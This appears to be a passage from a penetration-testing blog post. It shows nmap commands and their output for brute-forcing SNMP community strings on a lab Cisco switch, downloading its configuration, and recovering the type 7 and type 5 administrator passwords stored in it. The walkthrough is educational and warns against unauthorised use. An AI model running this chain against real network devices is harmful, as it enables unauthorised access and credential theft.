Once you have the configuration you may find the password in plain text. If not you can use my blog on "Decrypting Cisco type 5 passwords" to recover the password.
A lot of network devices have an SNMP Read/Write (RW) string configured. If they do NMAP has a script to pull down the configuration. But what if you don't know the RW community string? Luckily "private" is the default for a lot of devices and NMAP has a script for that!
To get started, create a file with your guesses. I usually start with just private in the file. If that doesn't work then I paste in my list of guesses. There are a lot of password lists on the Internet but I haven't found any snmp lists. What I have done is created a list based on all the switch/router configs that I have in my possession. If the script finds a community string it prints it out with the words "Valid Credentials". A note here, the script will return "Valid Credentials" whether it finds a RW community string or a Read Only (RO) string. The script used to pull down the configuration ONLY works with the RW string.
As always, DO NOT use this on a switch you don't own or have explicit written permission to work on. This script was run against a Cisco switch in my test lab. It wasn't connected to anything except my laptop.
Let's get started! Run this script and hopefully find a valid RW community string.
nmap -sU --script snmp-brute 192.168.10.100 --script-args snmp-brute.communitiesdb=c:\tftp-root\snmp-string.txt
Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-03 15:50 Pacific Standard Time
Stats: 0:13:44 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.13% done; ETC: 16:06 (0:01:52 remaining)
Stats: 0:13:45 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 86.22% done; ETC: 16:06 (0:01:52 remaining)
Nmap scan report for 192.168.10.100
Host is up (0.0057s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
67/udp open|filtered dhcps
123/udp open ntp
161/udp open snmp
| snmp-brute:
| private - Valid credentials
|_ public - Valid credentials
162/udp open|filtered snmptrap
In this case private was being used as a RW community string. Now that we have the RW community string we can run the script that pulls down the configuration. On this switch there is a type 7 password! In that case just hit the IOS App store or Google Play store and grab a "Cisco Type 7" app. It will recover the password in a split second without a word list.
nmap -sU -p 161 --script snmp-ios-config --script-args snmpcommunity=private 192.168.10.100
Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-03 15:23 Pacific Standard Time
Nmap scan report for 192.168.10.100
Host is up (0.0031s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-ios-config:
| !
| ! Last configuration change at 15:21:28 PST Tue Mar 3 2015 by mhubbard
| ! NVRAM config last updated at 15:21:31 PST Tue Mar 3 2015 by mhubbard
| !
| version 15.0
| no service pad
| service tcp-keepalives-in
| service tcp-keepalives-out
| service timestamps debug datetime msec localtime show-timezone
| service timestamps log datetime msec localtime show-timezone
| service password-encryption
| service sequence-numbers
| !
| hostname ACME_Test
| !
| boot-start-marker
| boot-end-marker
| !
| !
| username Test privilege 15 password 7 0037312531682F2506324F41
| username cisco privilege 15 secret 5 $1$CxMS$kdjNOfZxN6qcqqCWBDEvQ1
Snipped
No comments:
Post a Comment